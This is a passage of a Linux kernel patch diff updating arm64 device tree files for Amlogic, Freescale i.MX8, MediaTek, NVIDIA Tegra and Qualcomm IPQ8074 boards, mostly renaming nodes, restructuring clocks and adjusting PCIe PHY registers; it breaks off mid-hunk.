+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+index 5836b00309312..e1605a9b0a13f 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+@@ -168,15 +168,15 @@
+ 		reg = <0x32 0x20>;
+ 	};
+ 
+-	eth_mac: eth_mac@0 {
++	eth_mac: eth-mac@0 {
+ 		reg = <0x0 0x6>;
+ 	};
+ 
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@c {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ 
+@@ -217,7 +217,7 @@
+ 	pinctrl-names = "default";
+ 
+ 	/* RTC */
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+@@ -303,7 +303,7 @@
+ 
+ &usb {
+ 	status = "okay";
+-	phy-supply = <&usb_pwr>;
++	vbus-supply = <&usb_pwr>;
+ };
+ 
+ &spicc1 {
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+index 417523dc4cc03..ff2b33313e637 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+@@ -153,7 +153,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: clock-controller {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -162,7 +162,7 @@
+ 		};
+ 
+ 		scpi_sensors: sensors {
+-			compatible = "amlogic,meson-gxbb-scpi-sensors";
++			compatible = "amlogic,meson-gxbb-scpi-sensors", "arm,scpi-sensors";
+ 			#thermal-sensor-cells = <1>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 7f55d97f6c283..c063a144e0e7b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1694,7 +1694,7 @@
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+-					internal_ephy: ethernet_phy@8 {
++					internal_ephy: ethernet-phy@8 {
+ 						compatible = "ethernet-phy-id0180.3301",
+ 							     "ethernet-phy-ieee802.3-c22";
+ 						interrupts = <GIC_SPI 9 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+index e3bb6df42ff3e..cf0a9be83fc47 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+@@ -401,5 +401,4 @@
+ 
+ &usb {
+ 	status = "okay";
+-	dr_mode = "host";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+index 7677764eeee6e..f58fd2a6fe61c 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+@@ -58,26 +58,6 @@
+ 		compatible = "operating-points-v2";
+ 		opp-shared;
+ 
+-		opp-100000000 {
+-			opp-hz = /bits/ 64 <100000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-250000000 {
+-			opp-hz = /bits/ 64 <250000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-500000000 {
+-			opp-hz = /bits/ 64 <500000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-667000000 {
+-			opp-hz = /bits/ 64 <666666666>;
+-			opp-microvolt = <731000>;
+-		};
+-
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+ 			opp-microvolt = <731000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts b/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts
+index 1e40709610c52..c8e5a0a42b898 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-g12b-odroid-go-ultra.dts
+@@ -381,6 +381,7 @@
+ 		reg = <0x1c>;
+ 		interrupt-parent = <&gpio_intc>;
+ 		interrupts = <7 IRQ_TYPE_LEVEL_LOW>; /* GPIOAO_7 */
++		#clock-cells = <1>;
+ 
+ 		vcc1-supply = <&vdd_sys>;
+ 		vcc2-supply = <&vdd_sys>;
+@@ -391,7 +392,6 @@
+ 		vcc8-supply = <&vcc_2v3>;
+ 		vcc9-supply = <&vddao_3v3>;
+ 		boost-supply = <&vdd_sys>;
+-		switch-supply = <&vdd_sys>;
+ 
+ 		regulators {
+ 			vddcpu_a: DCDC_REG1 {
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+index bcdf55f48a831..4e84ab87cc7db 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+@@ -17,7 +17,7 @@
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		update-button {
++		button-update {
+ 			label = "update";
+ 			linux,code = <KEY_VENDOR>;
+ 			press-threshold-microvolt = <1300000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+index 5eed15035b674..11f89bfecb56a 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+@@ -233,7 +233,7 @@
+ 			reg = <0x14 0x10>;
+ 		};
+ 
+-		eth_mac: eth_mac@34 {
++		eth_mac: eth-mac@34 {
+ 			reg = <0x34 0x10>;
+ 		};
+ 
+@@ -250,7 +250,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: scpi_clocks@0 {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -532,7 +532,7 @@
+ 			#size-cells = <2>;
+ 			ranges = <0x0 0x0 0x0 0xc8834000 0x0 0x2000>;
+ 
+-			hwrng: rng {
++			hwrng: rng@0 {
+ 				compatible = "amlogic,meson-rng";
+ 				reg = <0x0 0x0 0x0 0x4>;
+ 			};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+index 6d8cc00fedc7f..5f2d4317ecfbf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+@@ -16,7 +16,7 @@
+ 
+ 	leds {
+ 		compatible = "gpio-leds";
+-		status {
++		led {
+ 			gpios = <&gpio_ao GPIOAO_13 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 			color = <LED_COLOR_ID_RED>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+index 9ef210f17b4aa..393d3cb33b9ee 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+@@ -18,7 +18,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		status {
++		led {
+ 			label = "n1:white:status";
+ 			gpios = <&gpio_ao GPIOAO_9 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+index b331a013572f3..c490dbbf063bf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+@@ -79,6 +79,5 @@
+ 		enable-gpios = <&gpio GPIOX_17 GPIO_ACTIVE_HIGH>;
+ 		max-speed = <2000000>;
+ 		clocks = <&wifi32k>;
+-		clock-names = "lpo";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+index 6831137c5c109..a18d6d241a5ad 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+@@ -86,11 +86,11 @@
+ };
+ 
+ &efuse {
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@C {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ };
+@@ -239,7 +239,7 @@
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&i2c_b_pins>;
+ 
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+index 04e9d0f1bde0f..5905a6df09b04 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+@@ -773,7 +773,7 @@
+ 		};
+ 	};
+ 
+-	eth-phy-mux {
++	eth-phy-mux@55c {
+ 		compatible = "mdio-mux-mmioreg", "mdio-mux";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+index cadba194b149b..38ebe98ba9c6b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+@@ -17,13 +17,13 @@
+ 	compatible = "bananapi,bpi-m5", "amlogic,sm1";
+ 	model = "Banana Pi BPI-M5";
+ 
+-	adc_keys {
++	adc-keys {
+ 		compatible = "adc-keys";
+ 		io-channels = <&saradc 2>;
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		key {
++		button-sw3 {
+ 			label = "SW3";
+ 			linux,code = <BTN_3>;
+ 			press-threshold-microvolt = <1700000>;
+@@ -123,7 +123,7 @@
+ 		regulator-min-microvolt = <1800000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		enable-gpio = <&gpio_ao GPIOE_2 GPIO_ACTIVE_HIGH>;
++		enable-gpio = <&gpio_ao GPIOE_2 GPIO_OPEN_DRAIN>;
+ 		enable-active-high;
+ 		regulator-always-on;
+ 
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+index a1f0c38ccadda..74088e7280fee 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+@@ -76,9 +76,17 @@
+ };
+ 
+ &cpu_thermal {
++	trips {
++		cpu_active: cpu-active {
++			temperature = <60000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "active";
++		};
++	};
++
+ 	cooling-maps {
+ 		map {
+-			trip = <&cpu_passive>;
++			trip = <&cpu_active>;
+ 			cooling-device = <&fan0 THERMAL_NO_LIMIT THERMAL_NO_LIMIT>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 4ee89fdcf59bd..b45852e8087a9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -563,7 +563,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mm_uid: unique-id@410 {
++				imx8mm_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index b7d91df71cc26..7601a031f85a0 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -564,7 +564,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mn_uid: unique-id@410 {
++				imx8mn_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index 03034b439c1f7..bafe0a572f7e9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -425,7 +425,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mp_uid: unique-id@420 {
++				imx8mp_uid: unique-id@8 {
+ 					reg = <0x8 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index 7ce99c084e545..6eb5a98bb1bd4 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -593,7 +593,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mq_uid: soc-uid@410 {
++				imx8mq_uid: soc-uid@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622.dtsi b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+index 146e18b5b1f46..7bb316922a3a9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+@@ -435,6 +435,7 @@
+ 	pwm: pwm@11006000 {
+ 		compatible = "mediatek,mt7622-pwm";
+ 		reg = <0 0x11006000 0 0x1000>;
++		#pwm-cells = <2>;
+ 		interrupts = <GIC_SPI 77 IRQ_TYPE_LEVEL_LOW>;
+ 		clocks = <&topckgen CLK_TOP_PWM_SEL>,
+ 			 <&pericfg CLK_PERI_PWM_PD>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index 0e9406fc63e2d..0ed5e067928b5 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -167,8 +167,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@1001c000 {
+-			compatible = "mediatek,mt7986-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt7986-wdt";
+ 			reg = <0 0x1001c000 0 0x1000>;
+ 			interrupts = <GIC_SPI 110 IRQ_TYPE_LEVEL_HIGH>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 402136bfd5350..268a1f28af8ce 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -585,6 +585,15 @@
+ 		method = "smc";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -968,8 +977,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 200 IRQ_TYPE_LEVEL_HIGH>;
+-			clocks = <&topckgen CLK_TOP_CLK13M>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		iommu: iommu@10205000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8186.dtsi b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+index c326aeb33a109..a02bf4ab1504d 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8186.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+@@ -47,14 +47,12 @@
+ 				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core1 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -214,10 +212,12 @@
+ 		};
+ 	};
+ 
+-	clk13m: oscillator-13m {
+-		compatible = "fixed-clock";
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
+ 		#clock-cells = <0>;
+-		clock-frequency = <13000000>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
+ 		clock-output-names = "clk13m";
+ 	};
+ 
+@@ -333,8 +333,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8186-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8186-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x1000>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 424fc89cc6f7c..627e3bf1c544b 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -29,6 +29,15 @@
+ 		rdma4 = &rdma4;
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -149,19 +158,16 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+-
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -534,8 +540,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 233 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CSW_F26M_D2>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10026000 {
+@@ -578,6 +583,8 @@
+ 			compatible = "mediatek,mt8192-scp_adsp";
+ 			reg = <0 0x10720000 0 0x1000>;
+ 			#clock-cells = <1>;
++			/* power domain dependency not upstreamed */
++			status = "fail";
+ 		};
+ 
+ 		uart0: serial@11002000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index c10cfeb1214d5..c5b8abc0c5854 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -151,22 +151,20 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+ 
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+ 
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -248,6 +246,15 @@
+ 		status = "disabled";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -687,8 +694,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8195-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8195-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x100>;
+ 			#reset-cells = <1>;
+@@ -705,7 +711,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 265 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CLK26M_D2>;
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10024000 {
+@@ -1549,6 +1555,7 @@
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges = <0 0 0x11e30000 0xe00>;
++			power-domains = <&spm MT8195_POWER_DOMAIN_SSUSB_PCIE_PHY>;
+ 			status = "disabled";
+ 
+ 			u2port1: usb-phy@0 {
+diff --git a/arch/arm64/boot/dts/nvidia/tegra194.dtsi b/arch/arm64/boot/dts/nvidia/tegra194.dtsi
+index 4afcbd60e144e..d8169920b33b4 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra194.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra194.dtsi
+@@ -1918,6 +1918,7 @@
+ 			interconnects = <&mc TEGRA194_MEMORY_CLIENT_HOST1XDMAR &emc>;
+ 			interconnect-names = "dma-mem";
+ 			iommus = <&smmu TEGRA194_SID_HOST1X>;
++			dma-coherent;
+ 
+ 			/* Context isolation domains */
+ 			iommu-map = <0 &smmu TEGRA194_SID_HOST1X_CTX0 1>,
+diff --git a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+index dd9a17922fe5c..a87e103f3828d 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+@@ -1667,7 +1667,7 @@
+ 		vin-supply = <&vdd_5v0_sys>;
+ 	};
+ 
+-	vdd_cam_1v2: regulator-vdd-cam-1v8 {
++	vdd_cam_1v2: regulator-vdd-cam-1v2 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vdd-cam-1v2";
+ 		regulator-min-microvolt = <1200000>;
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234.dtsi b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+index eaf05ee9acd18..77ceed615b7fc 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+@@ -571,6 +571,7 @@
+ 			interconnects = <&mc TEGRA234_MEMORY_CLIENT_HOST1XDMAR &emc>;
+ 			interconnect-names = "dma-mem";
+ 			iommus = <&smmu_niso1 TEGRA234_SID_HOST1X>;
++			dma-coherent;
+ 
+ 			/* Context isolation domains */
+ 			iommu-map = <0 &smmu_niso0 TEGRA234_SID_HOST1X_CTX0 1>,
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 4e51d8e3df043..4294beeb494fd 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -137,7 +137,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb1_pipe_clk_src";
++				clock-output-names = "usb3phy_1_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -180,7 +180,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb0_pipe_clk_src";
++				clock-output-names = "usb3phy_0_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -197,9 +197,9 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_qmp0: phy@86000 {
+-			compatible = "qcom,ipq8074-qmp-pcie-phy";
+-			reg = <0x00086000 0x1c4>;
++		pcie_qmp0: phy@84000 {
++			compatible = "qcom,ipq8074-qmp-gen3-pcie-phy";
++			reg = <0x00084000 0x1bc>;
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges;
+@@ -213,15 +213,16 @@
+ 				      "common";
+ 			status = "disabled";
+ 
+-			pcie_phy0: phy@86200 {
+-				reg = <0x86200 0x16c>,
+-				      <0x86400 0x200>,
+-				      <0x86800 0x4f4>;
++			pcie_phy0: phy@84200 {
++				reg = <0x84200 0x16c>,
++				      <0x84400 0x200>,
++				      <0x84800 0x1f0>,
++				      <0x84c00 0xf4>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_0_pipe_clk";
++				clock-output-names = "pcie20_phy0_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -242,14 +243,14 @@
+ 			status = "disabled";
+ 
+ 			pcie_phy1: phy@8e200 {
+-				reg = <0x8e200 0x16c>,
++				reg = <0x8e200 0x130>,
+ 				      <0x8e400 0x200>,
+-				      <0x8e800 0x4f4>;
++				      <0x8e800 0x1f8>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_1_pipe_clk";
++				clock-output-names = "pcie20_phy1_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -772,9 +773,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x10300000 0x10300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>,   /* downstream I/O */
++				 <0x82000000 0 0x10220000 0x10220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -817,16 +818,18 @@
+ 		};
+ 
+ 		pcie0: pci@20000000 {
+-			compatible = "qcom,pcie-ipq8074";
++			compatible = "qcom,pcie-ipq8074-gen3";
+ 			reg = <0x20000000 0xf1d>,
+ 			      <0x20000f20 0xa8>,
+-			      <0x00080000 0x2000>,
++			      <0x20001000 0x1000>,
++			      <0x00080000 0x4000>,
+ 			      <0x20100000 0x1000>;
+-			reg-names = "dbi", "elbi", "parf", "config";
++			reg-names = "dbi", "elbi", "atu", "parf", "config";
+ 			device_type = "pci";
+ 			linux,pci-domain = <0>;
+ 			bus-range = <0x00 0xff>;
+ 			num-lanes = <1>;
++			max-link-speed = <3>;
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+@@ -834,9 +837,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x20300000 0x20300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>, /* downstream I/O */
++				 <0x82000000 0 0x20220000 0x20220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -854,28 +857,30 @@
+ 			clocks = <&gcc GCC_SYS_NOC_PCIE0_AXI_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_M_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_S_CLK>,
+-				 <&gcc GCC_PCIE0_AHB_CLK>,
